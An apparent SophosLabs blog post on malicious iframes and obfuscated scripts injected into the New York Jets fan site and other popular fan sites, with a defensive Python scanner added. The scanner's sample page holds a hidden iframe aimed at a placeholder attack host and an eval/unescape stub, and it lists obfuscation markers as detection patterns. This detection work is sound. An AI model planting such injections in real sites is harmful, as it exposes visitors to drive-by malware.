Fan sites – an attractive target for hackers?

Earlier this morning I read a post on the TrendLabs blog describing how the New York Jets fan site has been compromised. I fed the URL into our automation systems and confirmed the malicious content – in fact 3 attack sites are used:

  1. an iframe loading malicious content from an Estonian site. This attack site appears to be returning some errors now, but historically (back in Nov 2007) we have seen it being used to install Mal/EncPk-AW using the usual cocktail of browser exploits.
  2. the Estonian site also loads content from another attack site hosted with a porn site. At the time of testing, this attack site is only serving up a 404 error. This attack site appears to have been created using a known kit (‘FirePack’) – numerous other attack sites using the same kit have been seen by SophosLabs.
  3. the compromised New York Jets page also contains a malicious script (pro-actively detected as Mal/ObfJS-A) which attempts to load content from yet another attack site. This one is well known to SophosLabs – known about and blocked since Oct 2007.
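The three injections above (a hidden iframe pulling from a third-party host, and an obfuscated inline script that loads further content) are the sort of thing a site owner can check for in their own published pages. The following is an added example, not SophosLabs code or anything from the post: a small Python scanner that parses a page, flags iframes and scripts whose host is not on the site's own allowlist, flags iframes sized or styled to be invisible, and flags inline scripts that combine `eval`/`unescape`-style markers with long runs of escaped bytes. The sample markup, the `fansite.example` hostnames and the `attack-site.example.invalid` placeholder are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a benign fan-site page into which a hidden iframe and an
# obfuscated script have been injected. Hostnames are placeholders, not real sites.
ALLOWED_HOSTS = {"fansite.example", "www.fansite.example"}
SAMPLE_HTML = """
<html><body>
<h1>Fan site</h1>
<script src="http://www.fansite.example/js/site.js"></script>
<iframe src="http://attack-site.example.invalid/in.php" width="0" height="0"
        style="visibility:hidden"></iframe>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28'))</script>
</body></html>
"""

# Markers commonly seen in obfuscated loaders, plus a run of 8+ escaped bytes.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")
ESCAPED_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}){8,}")


class InjectionScanner(HTMLParser):
    """Collects iframe attributes and script (src, inline body) pairs."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._script_attrs = None
        self._script_body = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            self.iframes.append(attrs)
        elif tag == "script":
            self._script_attrs = attrs
            self._script_body = []

    def handle_data(self, data):
        # HTMLParser delivers <script> contents as data; capture the inline body.
        if self._script_attrs is not None:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_attrs is not None:
            self.scripts.append((self._script_attrs.get("src"), "".join(self._script_body)))
            self._script_attrs = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _is_hidden(attrs):
    """True for zero/one-pixel frames or frames styled invisible."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def scan_html(html, allowed_hosts):
    """Return a list of (finding_kind, detail) for suspicious iframes and scripts."""
    allowed = {h.lower() for h in allowed_hosts}
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = _host(src)
        if host and host not in allowed:      # relative URLs have no host: same site
            findings.append(("external-iframe", src))
        if _is_hidden(attrs):
            findings.append(("hidden-iframe", src))
    for src, body in parser.scripts:
        if src:
            host = _host(src)
            if host and host not in allowed:
                findings.append(("external-script", src))
        elif any(m in body for m in OBFUSCATION_MARKERS) and ESCAPED_RUN.search(body):
            findings.append(("obfuscated-script", body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML, ALLOWED_HOSTS):
        print(f"{kind}: {detail}")
```

The allowlist is what makes this usable on a real site: legitimate embeds (an analytics script, a video frame) are added to it once, and anything else that appears in the published page is worth a look. Running it against a known-good copy of each page, then diffing the findings after every deploy, catches the kind of injection described above without needing to recognise the attack site in advance.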

The case got me thinking about other fan sites SophosLabs have come across recently. The evidence does not point to such sites being specifically targeted because of their content. Instead, I suspect they have been hit thanks to some of the characteristics they commonly share:

  • typically created and supported by hobbyists, so frequently hosted in cheap server farms, where if a single server gets compromised, hundreds of sites can be affected.
  • sites commonly use publicly available blogging tools to manage content. Vulnerabilities in such tools will be specifically targeted by hackers in order to potentially attack large numbers of sites.

When such sites get compromised, it can be a big win for the hackers. Looking through our data for the past couple of weeks, I pulled out two football-related fan sites. Alexa data for these sites shows a high traffic ranking for each, with significant numbers of visitors (just over 1 and 3 million respectively over a 3-month period).